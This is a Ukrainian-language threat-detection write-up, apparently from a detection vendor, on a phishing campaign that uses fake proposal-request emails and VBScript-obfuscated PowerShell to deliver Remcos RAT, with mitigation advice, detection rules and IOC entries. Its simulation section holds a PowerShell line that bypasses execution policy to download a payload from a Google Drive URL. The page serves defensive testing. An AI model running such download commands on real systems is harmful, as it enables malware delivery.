Фальшиві електронні листи із запитом на комерційну пропозицію використовуються у фішингових атаках із шкідливим ПЗ
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники розповсюджують фішингові електронні листи, замасковані під запити на проєктні пропозиції, щоб доставити шкідливе навантаження. Кампанія використовує VBScript для приховування команд PowerShell, які в решті-решт отримують багатоступеневе навантаження і Remcos RAT. Останній шкідливий код підтримує виконання віддалених команд, клавіатурний запис і витік даних із скомпрометованих систем.
Розслідування
Центр безпеки AhnLab (ASEC) виявив фішингову кампанію, в якій стислі архіви містять приховані VBScripts. Дослідники розкрили метод обфускації, що зловживає notepad.exe для відновлення імені виконуваного файла ‘powershell’ та використовує заміну рядків на основі токенів для команд PowerShell. Багатоступеневе навантаження також використовує COM-об’єкти для обходу UAC.
Пом’якшення
Користувачі повинні перевіряти домен електронної пошти відправника й залишатися обережними при відкритті неочікуваних вкладень або гіперпосилань. Організації мають налаштувати фільтрацію електронної пошти для блокування підозрілих розширень файлів, таких як .vbs, .exe і .js. Користувачам також слід уникати введення чутливих облікових даних на неофіційних або підозрілих URL-адресах, отриманих через небажані електронні листи.
Відповідь
Коли виявлено шкідливу активність, перевірте законність оригінального електронного листа та дослідіть підозрілу активність файлів у %APPDATA%. Перевірте несанкціоноване виконання PowerShell та індикатори, пов’язані з Remcos RAT. Ізолюйте скомпрометовані системи від мережі, щоб запобігти додатковій C2-комунікації, латеральній активності та ймовірному витоку даних.
Хід атаки
Ми все ще оновлюємо цю частину.
Виявлення
LOLBAS WScript / CScript (через process_creation)
Можливе Інфільтрація/Екфільтрація Даних / C2 через Сторонні Сервіси / Інструменти (через dns_query)
Можливе Інфільтрація/Екфільтрація Даних / C2 через Сторонні Сервіси / Інструменти (через dns)
IOC (HashMd5) для виявлення: Фішинг/Шахрайство: Остерігайтеся фішингових електронних листів, замаскованих під запити на пропозиції
IOC (SourceIP) для виявлення: Фішинг/Шахрайство: Остерігайтеся фішингових електронних листів, замаскованих під запити на пропозиції
IOC (DestinationIP) для виявлення: Фішинг/Шахрайство: Остерігайтеся фішингових електронних листів, замаскованих під запити на пропозиції
Виявлення скрипту PowerShell, що підключається до сервера C2 [З’єднання Мережі Windows]
Шкідливе виконання PowerShell через обфускацію VBScript [PowerShell Windows]
Виконання симуляції
-
Описатака та команди: Атакуючий відправляє фішинговий лист з посиланням на документ. Коли користувач клацає посилання, воно виконує приховану команду PowerShell, призначену для завантаження шкідливого скрипту з репозиторію Google Drive. Атакуючий використовує
export=downloadпараметр, щоб забезпечити безпосереднє завантаження файла, а не його перегляд у браузері. Мета полягає в виконанні безфайлового навантаження в пам’яті, щоб уникнути антивірусу на основі диска. Команда створена для активації спеціального правила виявлення, націленого на цю модель завантаження. -
Скрипт регресійного тесту:
# Симуляція завантаження файлу PowerShell з Google Drive через певний URL-паттерн $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J" Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Downloading payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`"" -
Команди очистки:
# Жодних файлів не записується на диск у цій специфічній симуляції, # але ми зупиняємо процес, якщо він все ще працює. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue